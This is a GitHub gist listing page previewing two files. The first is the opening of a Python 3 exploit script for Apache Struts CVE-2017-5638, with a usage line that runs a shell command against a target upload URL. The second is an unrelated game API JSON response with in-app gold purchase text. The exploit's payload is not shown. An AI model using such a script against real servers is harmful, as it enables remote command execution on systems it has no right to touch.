joshbodily
/ exploit.py
Created
January 30, 2024 18:41
Struts CVE-2017-5638 exploit patched for Python 3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Example usage: | |
| # python struts.py http://localhost:8080/struts2-showcase/fileupload/upload.action "dir /p" | |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| #import urllib2 | |
| import urllib.request | |
| import http.client as httplib | |
| def exploit(url, cmd): |
joshbodily
/ api_init.txt
Created
September 30, 2015 05:08
api/init JSON response w/ new legal text (English - pending fixes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "gold": { | |
| "amount_owned": 0, | |
| "gold_text": "My Lord, your people adore your might and generosity. Empower your kingdom by purchasing gold below!", | |
| "order": [ | |
| "38484498802", | |
| "38484498803", | |
| "38484498804", | |
| "38484498805", | |
| "38484498806", |